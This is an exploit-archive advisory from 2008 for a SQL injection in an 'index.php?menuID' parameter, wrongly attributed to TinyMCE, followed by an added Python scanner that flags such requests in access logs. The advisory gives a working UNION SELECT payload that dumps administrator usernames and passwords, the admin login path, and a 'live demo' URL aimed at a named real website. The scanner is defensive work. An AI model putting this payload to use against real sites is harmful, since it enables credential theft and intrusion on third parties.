# Title : TinyMCE 2.0.1 (index.php menuID) Remote SQL Injection Vulnerability
# Published : 2008-12-17
# Author : AnGeL25dZ
# removed from the frontend, the product affected isn't TinyMCE.
# if you know which CMS this is please contact me
# /str0ke
************************************************************
** TinyMCE Remote SQL Injection
************************************************************
** Product: TinyMCE Version 2.0.1
** Home : http://tinymce.moxiecode.com
** Vulnerability : 2/ SQL Injection
** Risk : high !!
** Dork : N/A
************************************************************
** Discovered by: AnGeL25dZ
** From : Constantine - Algeria
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeam http://www.hackteach.org/
** Ra3ch, His0k4
************************************************************
** Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
****************************************************************
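
Detection side of the request shown above, as an added example that is not part of the original advisory: a Python scan of web access logs for menuID values that are not plain integers. The log lines are constructed samples using documentation IP ranges, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log entry (format assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# menuID is used as a numeric key, so anything but digits is suspect.
NUMERIC_RE = re.compile(r'\d+')
SQL_TOKENS_RE = re.compile(r'\b(union|select|from|group_concat)\b', re.I)

# Constructed sample log lines, not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Dec/2008:10:01:02 +0000] "GET /index.php?menuID=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Dec/2008:10:03:40 +0000] "GET /index.php?menuID=-1%20union%20select%200,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3%20from%20adminusers HTTP/1.1" 200 812',
    '203.0.113.9 - - [17/Dec/2008:10:04:11 +0000] "GET /index.php?menuID=7%27 HTTP/1.1" 500 0',
    '198.51.100.4 - - [17/Dec/2008:10:05:00 +0000] "GET /cms/login.php HTTP/1.1" 200 900',
]

def check_line(line):
    """Return (decoded_value, reason) for a suspicious menuID, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Matched on any path so requests served via the directory index count too.
    query = urlsplit(m.group(1)).query
    for value in parse_qs(query, keep_blank_values=True).get('menuID', []):
        if NUMERIC_RE.fullmatch(value):
            continue  # ordinary numeric menu id
        reason = 'sql-keywords' if SQL_TOKENS_RE.search(value) else 'non-numeric'
        return value, reason
    return None

def scan(lines):
    """Return (line_number, client_ip, reason) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        result = check_line(line)
        if result:
            hits.append((number, line.split()[0], result[1]))
    return hits

if __name__ == '__main__':
    for number, client, reason in scan(SAMPLE_LOG):
        print(f'line {number}: {client} menuID {reason}')
```

A hit with a 200 response and the `sql-keywords` reason is the case to triage first, since the query ran and the page rendered.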